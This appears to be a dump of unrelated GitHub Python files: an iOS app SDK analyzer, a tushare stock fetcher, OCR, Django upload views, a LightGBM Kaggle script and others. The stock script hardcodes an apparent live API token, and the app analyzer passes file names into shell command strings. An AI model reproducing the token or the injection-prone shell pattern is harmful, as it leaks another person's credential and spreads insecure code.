test_parse_grid_to_dict(p, n, p_min, p_max, expected):\n assert set(neighbors(p, n, p_min, p_max)) == expected\n","repo_name":"lenarother/santa-helpers","sub_path":"tests/test_neighbors.py","file_name":"test_neighbors.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13234949283","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport zipfile\nimport logging\nimport commands\nimport shutil\nimport subprocess\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nPWD = os.getcwd()\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(PWD))) # '/Users/bfy/Documents/python/fyBaiCrawler'\nsys.path.append(BASE_DIR)\n\n\nfrom fyBaiCrawler.utils.excel_utils import ExcelWriter\nfrom fyBaiCrawler.analyse.a25pp.ios_policy import *\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n filename=BASE_DIR + '/logs/25pp/anaylse.log',\n filemode='w'\n)\n\n\nclass AppAnaylse(object):\n FILE_NAME_FOR_DOWNLOAD_25PP = os.path.join(BASE_DIR, \"datas/25pp/25pp_apps_downloader.txt\")\n APPS_DIR = os.path.join(BASE_DIR, \"datas/25pp/apps\")\n\n app_column_id_2_name = {\n 1: 
\"影音娱乐\",\n 4: \"社交通信\",\n 2: \"系统工具\",\n 3: \"阅读学习\",\n 6: \"摄影美化\",\n 5: \"生活购物\",\n 7: \"出行导航\",\n 33: \"金融理财\",\n 8: \"运动健康\",\n 9: \"商务办公\"\n }\n\n sheet_head = (\"Apps\", \"下载链接\", \"友盟\", \"TalkingData\", \"Mixpanel\", \"GrowingIO\", \"神策\", \"诸葛\")\n\n def __init__(self):\n self.excel_writer = ExcelWriter(\"records.xls\")\n self.column_id_set = set()\n\n self.anaylse_policies = (FileNameAnaylse(), StringsPolicy())\n\n def anaylse(self, app_path, app_name, app_downurl, app_ranking, app_column_id):\n unzip_dir = os.path.join(os.getcwd(), app_name.replace(\"/\", \"_\"))\n status, output = commands.getstatusoutput('unzip -o \"{app_path}\" -d \"{unzip_dir}\"'.\n format(app_path=app_path, unzip_dir=unzip_dir))\n\n if status != 0:\n logging.warning(\"app - {app_path} unzip failed. --> {output}\".format(app_path=app_path, output=output[0: 200]))\n return unzip_dir\n\n payload_path = os.path.join(unzip_dir, \"Payload\")\n if not os.path.exists(payload_path):\n logging.warning(\"no Payload directory in this app - {app_path}\".format(app_path=app_path))\n return unzip_dir\n\n find_app_command = 'cd \"{payload_path}\" && ls -d */ | grep \"app\"'.format(payload_path=payload_path)\n app_dir = commands.getoutput(find_app_command)\n\n if not app_dir:\n logging.warning(\"no xxx.app in this app - {app_path}\".format(app_path=app_path))\n return unzip_dir\n\n find_path = os.path.join(payload_path, app_dir)\n anaylse_results = {}\n for anaylse_policy in self.anaylse_policies:\n anaylse_result = anaylse_policy.anaylse(find_path)\n self.combine_anaylse_results(anaylse_results, anaylse_result)\n\n self.take_notes(app_name, anaylse_results, app_downurl, app_ranking, app_column_id)\n return unzip_dir\n\n def combine_anaylse_results(self, anaylse_results, anaylse_result):\n \"\"\"将多次分析结果组合\n :param anaylse_results: 总的分析统计\n :param anaylse_result: 单次的分析结果\n :return:\n \"\"\"\n for key, value in anaylse_result.items():\n if key in anaylse_results:\n anaylse_results[key] = anaylse_results[key] + \", \" + value\n else:\n anaylse_results[key] = anaylse_result[key]\n\n def anaylse_apps(self):\n def open_file():\n fp = open(self.FILE_NAME_FOR_DOWNLOAD_25PP, \"r\")\n for line in fp:\n yield json.loads(line)\n fp.close()\n\n for i, app in enumerate(open_file()):\n logging.info('anaylse number {number} app {app_name} -----------------'.format(number=i, app_name=app['app_name']))\n if not app['files']:\n logging.warning(\"there is no ipa for this app - {app_name}\".format(app_name=app['app_name']))\n continue\n app_path = os.path.join(self.APPS_DIR, app['files'][0]['path'])\n app_name = app['app_name']\n app_downurl = app['app_downurl']\n app_ranking = app['ranking']\n app_column_id = app['column_id']\n unzip_dir = self.anaylse(app_path, app_name, app_downurl, app_ranking, app_column_id)\n if os.path.exists(unzip_dir): shutil.rmtree(unzip_dir) # 分析完删除该目录\n\n self.excel_writer.close()\n\n def take_notes(self, app_name, anaylse_results, app_downurl, app_ranking, app_column_id):\n app_column_name = self.app_column_id_2_name[app_column_id]\n if app_column_id not in self.column_id_set:\n self.column_id_set.add(app_column_id)\n self.excel_writer.write_head(app_column_name, args=self.sheet_head)\n\n args = [None] * len(self.sheet_head)\n args[0] = app_name\n args[1] = app_downurl\n for company, value in anaylse_results.items():\n index = self.sheet_head.index(company)\n args[index] = value\n self.excel_writer.write_record(app_column_name, requested_index=app_ranking + 1, args=args)\n\n\nif __name__ == '__main__':\n 
app_anaylse = AppAnaylse()\n app_anaylse.anaylse_apps()\n\n","repo_name":"echobfy/fyBaiCrawler","sub_path":"fyBaiCrawler/analyse/a25pp/app_anaylse.py","file_name":"app_anaylse.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43450941871","text":"import os\nimport tushare as ts\nimport pandas as pd\n\nts.set_token('2a502c019dd831077592283439e635b8a843b43da1ff16dfe53646b4')\npro = ts.pro_api()\ndef get_stock_list():\n if not os.path.exists('data/stock_list.csv'):\n data = pro.stock_basic(exchange='', list_status='L', fields='ts_code,symbol,name,area,industry,list_date')\n df = pd.DataFrame(data=data)\n print(df.columns)\n df.to_csv('data/stock_list.csv', index=False, encoding='utf-8')\n else:\n df = pd.read_csv('data/stock_list.csv')\n return df\n\ndef single_stock():\n df = pro.daily(ts_code='000001.SZ', start_date='2010701', end_date='20200730')\n print(df.shape)\n\nif __name__ == '__main__':\n single_stock()\n\n","repo_name":"lukegs7/python-projects","sub_path":"single_thread/money/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27307006399","text":"#!/usr/bin/env python\n\nimport argparse\nimport logging\n\nfrom oasislmf import __version__ as oasis_version\nfrom oasislmf.pytools.gul import manager, logger\n\nparser = argparse.ArgumentParser(\n usage='use \"%(prog)s --help\" for more information',\n formatter_class=argparse.RawTextHelpFormatter # for multi-line help text\n)\n\nparser.add_argument('-a', help='back-allocation rule', default=0, type=int, dest='alloc_rule')\nparser.add_argument('--ignore-correlation',\n help='if passed, peril correlation groups (if defined) are ignored for the generation of correlated samples',\n action='store_true', dest='ignore_correlation', default=False)\nparser.add_argument('-d', help='output random numbers instead of gul (default: False).',\n default=False, action='store_true', dest='debug')\nparser.add_argument('-i', '--file-in', help='filename of input stream.', action='store', type=str, dest='file_in')\nparser.add_argument('-o', '--file-out', help='filename of output stream.', action='store', type=str, dest='file_out')\nparser.add_argument('-L', help='Loss treshold (default: 1e-6)', default=1e-6,\n action='store', type=float, dest='loss_threshold')\nparser.add_argument('-S', help='Sample size (default: 0).', default=0, action='store', type=int, dest='sample_size')\nparser.add_argument('--peril-filter', help='Id of the peril to keep, if empty take all perils', nargs='+')\nparser.add_argument('-V', '--version', action='version', version='{}'.format(oasis_version))\nparser.add_argument('--ignore-file-type', nargs='*', help='the type of file to be loaded', default=set())\nparser.add_argument('--random-generator',\n help='random number generator\\n0: numpy default (MT19937), 1: Latin Hypercube. Default: 1.',\n default=1, type=int)\nparser.add_argument('--run-dir', help='path to the run directory', default='.')\nparser.add_argument('--logging-level',\n help='logging level (debug:10, info:20, warning:30, error:40, critical:50). Default: 30.',\n default=30, type=int)\n\n\ndef main():\n # parse arguments to variables\n # note: the long flag name (e.g., '--opt-one') is used as variable name (i.e, the `dest`).\n # hyphens in the long flag name are parsed to underscores, e.g. 
'--opt-one' is stored in `opt_one``\n kwargs = vars(parser.parse_args())\n\n # add handler to gul logger\n ch = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logging_level = kwargs.pop('logging_level')\n logger.setLevel(logging_level)\n\n manager.run(**kwargs)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OasisLMF/OasisLMF","sub_path":"oasislmf/pytools/gulpy.py","file_name":"gulpy.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"54"} +{"seq_id":"11626194844","text":"import cv2\nimport os\nimport numpy as np\nimport random\nimport pytesseract\npytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\nfrom multiprocessing import Pool\n\ndef scoreImgOCR(image):\n scoreImg = image\n if scoreImg.size == 0:\n return ''\n ### Threshold Preprocessing\n scoreImg, = thresholdPreprocess([scoreImg])\n\n ### get Each Digit ROI\n ROIs = getDigitsROI(scoreImg)\n ### OCR\n return getPredictText(ROIs)\n\ndef scoreboardOCR(scoreboardImg, cropData):\n ### Get Score Position by Format\n scoreImgs = getScoreImgs(scoreboardImg, cropData)\n # predictTexts = []\n # for scoreImg in scoreImgs:\n # predictTexts.append(scoreImgOCR(scoreImg))\n # return predictTexts\n with Pool(4) as p:\n return p.map(scoreImgOCR, scoreImgs)\n \ndef getScoreImgs(scoreboardImg, cropData):\n scoreImgs = []\n for idx, data in enumerate(cropData):\n # x, y, w, h = data\n # scoreImgs.append(scoreboardImg[y:y+h, x:x+w].copy())\n x1, y1, x2, y2 = data\n scoreImgs.append(scoreboardImg[y1:y2, x1:x2].copy())\n return scoreImgs\n\ndef thresholdPreprocess(images):\n for idx, image in enumerate(images):\n\n ### cvtColor to gray\n images[idx] = cv2.cvtColor(images[idx], cv2.COLOR_BGR2GRAY)\n\n ### threshold\n _, images[idx] = cv2.threshold(images[idx], 0, 255, cv2.THRESH_OTSU)\n\n ### convert to black background white word\n count_white = np.sum(images[idx] > 0)\n count_black = np.sum(images[idx] == 0)\n if count_white > count_black:\n images[idx] = 255 - images[idx]\n return images\n\ndef getDigitsROI(image):\n ImgH, ImgW = image.shape\n totalArea = ImgH*ImgW\n retval, labels, stats, centroids = cv2.connectedComponentsWithStats(image, connectivity=4)\n\n ROIs = []\n xPos = []\n for idx, statistic in enumerate(stats):\n areaProportion = round(100*statistic[4]/totalArea, 2)\n if areaProportion > 5.0 and areaProportion < 50.0:\n x, y, w, h = statistic[0:4]\n ROI = image[y:y+h,x:x+w].copy()\n\n ### ROI resize\n parameter = 32/h\n ROI = cv2.resize(ROI, (int(w*parameter), int(h*parameter)), interpolation=cv2.INTER_NEAREST)\n\n ### ROI paddding\n yAxisPadding = max(0, int((52-h)/2))\n xAxisPadding = max(0, int((51-w)/2))\n ROI = cv2.copyMakeBorder(ROI, yAxisPadding, yAxisPadding, xAxisPadding, xAxisPadding, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n \n ### convert to white background black word\n ROI = 255 - ROI\n\n ROIs.append(ROI)\n xPos.append(x)\n ### Sort ROIs\n sortedROIs = [ROI for _,ROI in sorted(zip(xPos,ROIs), key=lambda pair: pair[0])]\n return sortedROIs\n\ndef getPredictText(ROIs, lang=\"TableTennis\", cong=\"--oem 3 --psm 13 -c tessedit_char_whitelist=0123456789\"):\n texts = []\n for ROI in ROIs:\n boxes = pytesseract.image_to_boxes(ROI, lang=lang, config=cong)\n for b in boxes.splitlines():\n b = b.split(' ')\n texts.append(b[0])\n if len(texts) == 0:\n return ''\n else:\n return 
''.join(texts)\n\nif __name__ == '__main__':\n # imagePath = r\"../images/video1_classified/2_3_10_11/frame19750.png\"\n # scoreboardImg = cv2.imread(imagePath)\n # print(scoreboardOCR(scoreboardImg, cropData=video1_cropData))\n \n scoreImgs = []\n imagePath = r\"../images/video2_digits/baseline/originAvg/0\"\n fileNames = os.listdir(imagePath)\n correct = 0\n total = 0\n for fileName in fileNames:\n image = cv2.imread(os.path.join(imagePath, fileName))\n image, = thresholdPreprocess([image])\n\n ROIs = getDigitsROI(image)\n if getPredictText(ROIs) == '0':\n correct = correct+1\n # else:\n # cv2.imshow('ROIs[0]', ROIs[0])\n # cv2.waitKey(0)\n total = total+1\n print('correct = ', correct)\n print('total = ', total)","repo_name":"AceBenson/Scoreboard-Analysis","sub_path":"DigitsRecognition/scoreboardOCR.py","file_name":"scoreboardOCR.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31719765789","text":"#LinearSearch\ndef Linear_Search(arr1,x): \n for i in range(len(arr1)):\n if arr1[i]==x:\n return i\n return -1 #If not present\n \narr=[int(x) for x in input(\"Enter elements in an array \").split()]\nk=int(input(\"Enter Search Element\"))\nindex=Linear_Search(arr,k)\nif(index!=-1):\n print(\"The element is present at index\"+str(index))\nelse:\n print(\"The element is not present\")","repo_name":"vikasini55/DataStructures1","sub_path":"LinearSearch.py","file_name":"LinearSearch.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5645434394","text":"from Aircraft import Aircraft\n\nclass Carrier:\n def __init__(self, initial_ammo, health_point):\n self.__aircrafts = []\n self.__initial_ammo = initial_ammo\n self.__ammo = initial_ammo\n self.__health_point = health_point\n\n def add(self, aircraft: Aircraft):\n self.__aircrafts.append(aircraft)\n\n# region - Not yet implemented:\n# If there is not enough ammo then it should start to fill the aircrafts with priority first\n# endregion\n\n # It should fill all the aircraft with ammo and\n # subtract the needed ammo from the ammo storage\n def fill(self):\n # If there is no ammo when this method is called, it should throw an exception\n if self.__ammo <= 0:\n raise Exception(\"Sorry, no ammo enough\")\n\n for aircraft in self.__aircrafts:\n if self.__ammo <=0:\n break\n\n self.__ammo = aircraft.refill(self.__ammo)\n","repo_name":"talathkhaleel1/learning","sub_path":"application_development/app_dev_with_inheritance/Aircraft/Carrier.py","file_name":"Carrier.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16748401386","text":"import json\nimport os\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.staticfiles import finders\nfrom django.http import HttpRequest, HttpResponse\nfrom django.urls import reverse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\n\nfrom .services.files import handle_uploaded_file\nfrom .services.analyzer import analyzeExcelFile\nfrom .services.cleaner import clean_data\nfrom .services.symanto import symanted_data\nfrom .services.diffuser import fuzzed_data\n\nfrom django.conf import settings\n\n\n@login_required(login_url='login')\ndef dashboard(request):\n methodIsPOST = request.method == 'POST'\n\n course = 
request.POST['course'] if methodIsPOST else None\n professor = request.POST['professor'] if methodIsPOST else None\n filename = request.POST['filename'] if methodIsPOST else request.GET.get(\n 'filename', None)\n\n if filename != None:\n context = analyzeExcelFile(filename, professor, course)\n return render(request, 'dashboard/index.html', context)\n else:\n context = {\n 'error': f'File {filename} not exist. Upload any other file.'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n\ndef download_report(request):\n show_preview = request.GET.get('preview', 'false') == 'true'\n professor = request.GET.get('professor', None)\n course = request.GET.get('course', None)\n emotionsObject = request.GET.get('emotions', '{}')\n\n emotionsObject = json.loads(emotionsObject)\n\n emotions = []\n values = []\n\n for emotion, value in emotionsObject.items():\n emotions.append(emotion)\n values.append(value)\n\n rangeE = list(range(0, len(emotions), 2))\n\n context = {\n 'professor': professor,\n 'course': course,\n 'emotions': emotions,\n 'values': values,\n 'range': rangeE\n }\n\n if show_preview:\n return render(request, 'dashboard/report_view_new.html', context=context)\n else:\n # return render(request, 'dashboard/report_view.html', context=context)\n # Obtener el HTML generado con información.\n template = get_template('dashboard/report_view.html')\n html = template.render(context)\n\n # Crear el objeto HttpResponse con el tipo MIME apropiado para el archivo PDF.\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mi_archivo.pdf\"'\n\n # Convertir el HTML a un archivo PDF utilizando xhtml2pdf y la función de callback.\n pisa_status = pisa.CreatePDF(\n html, dest=response, link_callback=link_callback)\n\n # Si la conversión a PDF falla, devolver un mensaje de error.\n if pisa_status.err:\n return HttpResponse('Error al generar el archivo PDF')\n\n # Devolver la respuesta con el archivo PDF generado.\n return response\n\n\ndef link_callback(uri, rel):\n \"\"\"\n Convert HTML URIs to absolute system paths so xhtml2pdf can access those\n resources\n \"\"\"\n result = finders.find(uri)\n if result:\n if not isinstance(result, (list, tuple)):\n result = [result]\n result = list(os.path.realpath(path) for path in result)\n path = result[0]\n else:\n sUrl = settings.STATIC_URL # Typically /static/\n sRoot = settings.STATIC_ROOT # Typically /home/userX/project_static/\n mUrl = settings.MEDIA_URL # Typically /media/\n mRoot = settings.MEDIA_ROOT # Typically /home/userX/project_static/media/\n\n if uri.startswith(mUrl):\n path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\n elif uri.startswith(sUrl):\n path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\n else:\n return uri\n\n # make sure that file exists\n if not os.path.isfile(path):\n raise Exception(\n 'media URI must start with %s or %s' % (sUrl, mUrl)\n )\n return path\n\n\n@login_required(login_url='login')\ndef upload_file(request: HttpRequest):\n if request.method == 'GET':\n return render(request, 'dashboard/upload_file.html')\n\n file = request.FILES['file'] if 'file' in request.FILES else None\n\n # Upload file\n uploaded, filename, err = handle_uploaded_file(file)\n\n if not uploaded:\n context = {\n 'error': f'There was an error uploading the file: {filename}. 
Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File uploaded to {filename}')\n\n # Clean data\n cleaned, cleaned_filename, err = clean_data(filename, 'words-cache.temp')\n\n if not cleaned:\n context = {\n 'error': f'There was an error cleaning the file: {filename}. Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File cleaned to {cleaned_filename}')\n\n # Symante logic data\n symanted, symante_filename, err = symanted_data(\n cleaned_filename, 'symanto-cache.temp')\n\n if not symanted:\n context = {\n 'error': f'There was an error symanting the file: {cleaned_filename}. Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File symanted to {symante_filename}')\n\n # Diffuse logic data\n diffused, diffused_filename, err = fuzzed_data(symante_filename)\n\n if not diffused:\n context = {\n 'error': f'There was an error symanting the file: {symante_filename}. Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File diffused to {diffused_filename}')\n\n # Analyze data in dashboard view\n return redirect(reverse('dashboard') + f'?filename={diffused_filename}')\n","repo_name":"Scoowy/django-do-deploy","sub_path":"fuzzysystem/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2481631305","text":"# -*- coding: utf-8 -*-\r\n# -----------------------------------------------------------------------------\r\n# LightGBM regression example\r\n# https://www.kaggle.com/tobikaggle/humble-lightgbm-starter/\r\n# __author__ = \"DDgg\"\r\n# https://www.kaggle.com/c/mercedes-benz-greener-manufacturing\r\n# -----------------------------------------------------------------------------\r\nimport numpy as np\r\nimport lightgbm as lgb\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# ----------------------------------------------------------------------------\r\n# Display PCA, ICA, t-SNE add to see skewness\r\n# -----------------------------------------------------------------------------\r\n\r\n# data imnport \r\n# fork of forks from https://www.kaggle.com/jaybob20/starter-xgboost\r\n# Any results you write to the current directory are saved as output.\r\ntrain = pd.read_csv('../input/train.csv')\r\ntest = pd.read_csv('../input/test.csv')\r\n\r\n#pca_3D_plot(test)\r\n\r\nfor c in train.columns:\r\n if train[c].dtype == 'object':\r\n lbl = LabelEncoder() \r\n lbl.fit(list(train[c].values) + list(test[c].values)) \r\n train[c] = lbl.transform(list(train[c].values))\r\n test[c] = lbl.transform(list(test[c].values))\r\n\r\n# shape \r\nprint('Shape train: {}\\nShape test: {}'.format(train.shape, test.shape))\r\n \r\n#------------------------------------------------------------------------------\r\n# pca transform forked from https://www.kaggle.com/jaybob20/starter-xgboost/code\r\n# pca and Ica transform from https://www.kaggle.com/uluumy/mercedez-baseline-2\r\n# OLD The rmse of prediction is: 
7.3375551233\r\n\r\n##Add decomposed components: PCA / ICA etc.\r\nfrom sklearn.decomposition import PCA, FastICA\r\n\r\n## optimize and display number of components // whole dataset\r\n# 5 comp: The r2 is: 0.691174519763 the rmse is: 7.04535736811\r\n# 10 comp: The r2 is: 0.709094189016 the rmse is: 6.83789870052\r\n# 20 comp: The r2 is: 0.726726138723 the rmse is: 6.6274355197\r\n# 30 comp: The r2 is: 0.742673315642 the rmse is: 6.4311535142\r\n# 40 comp: The r2 is: 0.747617698519 the rmse is: 6.36906839436\r\n# 60 comp: The r2 is: 0.988973825782 the rmse is: 1.33124775841\r\n# 80 comp: The r2 is: 0.990269624615 the rmse is: 1.25057937524\r\n# 20L The r2 is: 0.993219353078 the rmse is: 1.04395560348\r\n# 40L The r2 is: 0.998705771167 the rmse is: 0.456091522319\r\n# 100 comp: The r2 is: 0.991084646309 the rmse is: 1.19705954246\r\n# 160 comp: The r2 is: 0.992118848356 the rmse is: 1.12548913381\r\n# 200 comp: The r2 is: 0.993216736475 the rmse is: 1.04415701154\r\n# 300 comp: The r2 is: \r\n# 377 comp The r2 is: 0.99903249422 the rmse is: 0.394342194068\r\n#----------------------------------------------------------------\r\n## 80/20 split with random_state=123\r\n\r\n# 2 comp: The r2 is: 0.638091262363 the rmse is: 7.35414169879\r\n# 5 comp: The r2 is: 0.639438224827 the rmse is: 7.34044351212\r\n# 6 comp: The r2 is: 0.648019302812 the rmse is: 7.2525692268\r\n# 7 comp: The r2 is: 0.638189248199 the rmse is: 7.35314607417\r\n# 10 comp: The r2 is: 0.637207039653 the rmse is: 7.36312011156\r\n# 20 comp: The r2 is: 0.633268557399 the rmse is: 7.4029792608\r\n# 30 comp: The r2 is: 0.632985260523 the rmse is: 7.40583807761\r\n# 40 comp: The r2 is: 0.632551562409 the rmse is: 7.4102124928\r\n# 80 comp: The r2 is: 0.629313920054 the rmse is: 7.44278713255\r\n# 100 comp: The r2 is: 0.628919943592 the rmse is: 7.44674129266\r\n# 200 comp: The r2 is: 0.623010420635 the rmse is: 7.50580249174\r\n# 300 comp: The r2 is: 0.620508076124 the rmse is: 7.53067193139 \r\n# 377 comp: The r2 is: 0.627785004593 the rmse is: 7.45812043387\r\nn_comp = 6\r\n\r\n# PCA\r\npca = PCA(n_components=n_comp, random_state=42)\r\npca2_results_train = pca.fit_transform(train.drop([\"y\"], axis=1))\r\npca2_results_test = pca.transform(test)\r\n\r\n# ICA\r\nica = FastICA(n_components=n_comp, random_state=42)\r\nica2_results_train = ica.fit_transform(train.drop([\"y\"], axis=1))\r\nica2_results_test = ica.transform(test)\r\n\r\n# Append decomposition components to datasets\r\nfor i in range(1, n_comp+1):\r\n train['pca_' + str(i)] = pca2_results_train[:,i-1]\r\n test['pca_' + str(i)] = pca2_results_test[:, i-1]\r\n \r\n train['ica_' + str(i)] = ica2_results_train[:,i-1]\r\n test['ica_' + str(i)] = ica2_results_test[:, i-1]\r\n \r\n \r\n# remove duplicates - needs to be applied to test too\r\n# train = train.T.drop_duplicates().T\r\n# test = test.T.drop_duplicates().T\r\n\r\n \r\ny_train = train[\"y\"]\r\ny_mean = np.mean(y_train)\r\ntrain.drop('y', axis=1, inplace=True)\r\n\r\n#------------------------------------\r\n# split into training and validation set\r\n# the data has a number of outliers, so the validation size needs\r\n# to be large enough plus cross-validation is needed\r\n\r\n# RND= 123 The r2 is: 0.648019302812 the rmse is: 7.2525692268\r\n# RND= 63466 The r2 is: 0.702588909905 the rmse is: 6.24188256127\r\n\r\nX_train, X_valid, y_train, y_valid = train_test_split(\r\n train, y_train, test_size=0.2, random_state=9127)\r\n\r\n# bad bad\r\n# X_train = train\r\n# X_valid = train\r\n# y_train = y_train\r\n# y_valid = 
y_train\r\n\r\n# create dataset for lightgbm\r\nlgb_train = lgb.Dataset(X_train, y_train)\r\nlgb_valid = lgb.Dataset(X_valid, y_valid, reference=lgb_train)\r\n\r\n# to record eval results for plotting\r\nevals_result = {} \r\n\r\n# The r2 is: 0.648019302812 the rmse is: 7.2525692268\r\n# specify your configurations as a dict\r\nparams = {\r\n 'task': 'train',\r\n 'boosting_type': 'gbdt',\r\n 'objective': 'regression',\r\n 'metric': {'l2'},\r\n 'num_leaves': 5,\r\n 'learning_rate': 0.06,\r\n 'max_depth': 4,\r\n 'subsample': 0.95,\r\n 'feature_fraction': 0.9,\r\n 'bagging_fraction': 0.85,\r\n 'bagging_freq': 4,\r\n 'min_data_in_leaf':4,\r\n 'min_sum_hessian_in_leaf': 0.8,\r\n 'verbose':10\r\n}\r\n\r\nprint('Start training...')\r\n\r\n# train\r\ngbm = lgb.train(params,\r\n lgb_train,\r\n num_boost_round=8000, # 200\r\n valid_sets=[lgb_train, lgb_valid],\r\n evals_result=evals_result,\r\n verbose_eval=10,\r\n early_stopping_rounds=50) # 50\r\n\r\n#print('\\nSave model...')\r\n# save model to file\r\n#gbm.save_model('model.txt')\r\n\r\nprint('Start predicting...')\r\n# predict\r\ny_pred = gbm.predict(X_valid, num_iteration=gbm.best_iteration)\r\n\r\nprint('\\nFeature names:', gbm.feature_name())\r\n\r\nprint('\\nCalculate feature importances...')\r\n\r\n# feature importances\r\nprint('Feature importances:', list(gbm.feature_importance()))\r\n\r\n# -------------------------------------------------------\r\nprint('Plot metrics during training...')\r\nax = lgb.plot_metric(evals_result, metric='l2')\r\nplt.show()\r\n\r\nprint('Plot feature importances...')\r\nax = lgb.plot_importance(gbm, max_num_features=10)\r\nplt.show()\r\n# -------------------------------------------------------\r\n# eval r2-score \r\nfrom sklearn.metrics import r2_score\r\nr2 = r2_score(y_valid, y_pred)\r\n\r\n# eval rmse (lower is better)\r\nprint('\\nThe r2 is: ',r2, 'the rmse is:', mean_squared_error(y_valid, y_pred) ** 0.5)\r\n\r\n# -------------------------------------------------------\r\nprint('\\nPredicting test set...')\r\ny_pred = gbm.predict(test, num_iteration=gbm.best_iteration)\r\n\r\n# y_pred = model.predict(dtest)\r\noutput = pd.DataFrame({'id': test['ID'], 'y': y_pred})\r\noutput.to_csv('submit-lightgbm-ICA-PCA.csv', index=False)\r\n\r\n# -----------------------------------------------------------------------------\r\nprint(\"Finished.\")\r\n# -----------------------------------------------------------------------------\r\n\r\n#==============================================================================\r\n# # Grid search example // uncomment block if needed\r\n# from sklearn.model_selection import GridSearchCV\r\n# estimator = lgb.LGBMRegressor()\r\n# \r\n# print(\"\\n-----------------------------------------------------------------------------\")\r\n# #==============================================================================\r\n#==============================================================================\r\n# print(\"Now doing grid search.\")\r\n# \r\n# # get possible parameters\r\n# estimator.get_params().keys()\r\n# \r\n# # fill parameters ad libitum\r\n# param_grid = {\r\n# 'num_leaves': [2, 5, 10, 20], \r\n# 'learning_rate': [0.06],\r\n# 'n_estimators': [100],\r\n# # 'colsample_bytree' :[],\r\n# # 'min_split_gain' :[],\r\n# # 'subsample_for_bin' :[],\r\n# 'max_depth' :[1,2,3,4,5,10],\r\n# # 'subsample' :[], \r\n# # 'reg_alpha' :[], \r\n# # 'max_drop' :[], \r\n# # 'gaussian_eta' :[], \r\n# # 'drop_rate' :[], \r\n# # 'silent' :[], \r\n# # 'boosting_type' :[], \r\n# # 'min_child_weight' :[], \r\n# 
# 'skip_drop' :[], \r\n# # 'learning_rate' :[], \r\n# # 'fair_c' :[], \r\n# # 'seed' :[], \r\n# # 'poisson_max_delta_step' :[], \r\n# # 'subsample_freq' :[], \r\n# # 'max_bin' :[], \r\n# # 'n_estimators' :[], \r\n# # 'nthread' :[], \r\n# # 'min_child_samples' :[], \r\n# # 'huber_delta' :[], \r\n# # 'use_missing' :[], \r\n# # 'uniform_drop' :[], \r\n# # 'reg_lambda' :[], \r\n# # 'xgboost_dart_mode' :[], \r\n# # 'objective'\r\n# }\r\n# \r\n# \r\n# gbm = GridSearchCV(estimator, param_grid)\r\n# \r\n# gbm.fit(X_train, y_train)\r\n# \r\n# # list them\r\n# print('Best parameters found by grid search are:', gbm.best_params_)\r\n# print(\"finished grid search\")\r\n#==============================================================================\r\n# -----------------------------------------------------------------------------","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/mercedes-benz-greener-manufacturing/DDgg/humble-lightgbm-starter.py","file_name":"humble-lightgbm-starter.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"71541975201","text":"\nimport urllib2\nimport json \nimport subprocess\nimport os\nimport time\nimport sys\nimport argparse\n\n\"\"\"\nThis script attempts to bootstrap this machine into a couchbase cluster using the\ncbbootstrap REST API.\n\nIt assumes:\n\n- The cbbootstrap REST api is available at CBBOOTSTRAP_API_URL\n- Couchbase Server is installed locally, but not initialized\n\n\"\"\"\n\n# This is an AWS Lambda function running behind a API Gateway. The code is available at https://github.com/couchbase/cbbootstrap\nCBBOOTSTRAP_API_URL = \"https://5e61vqxs5f.execute-api.us-east-1.amazonaws.com/Prod/cluster\"\n\ncouchbase_server_bin_path = \"/opt/couchbase/bin\"\ncouchbase_server_admin_port = 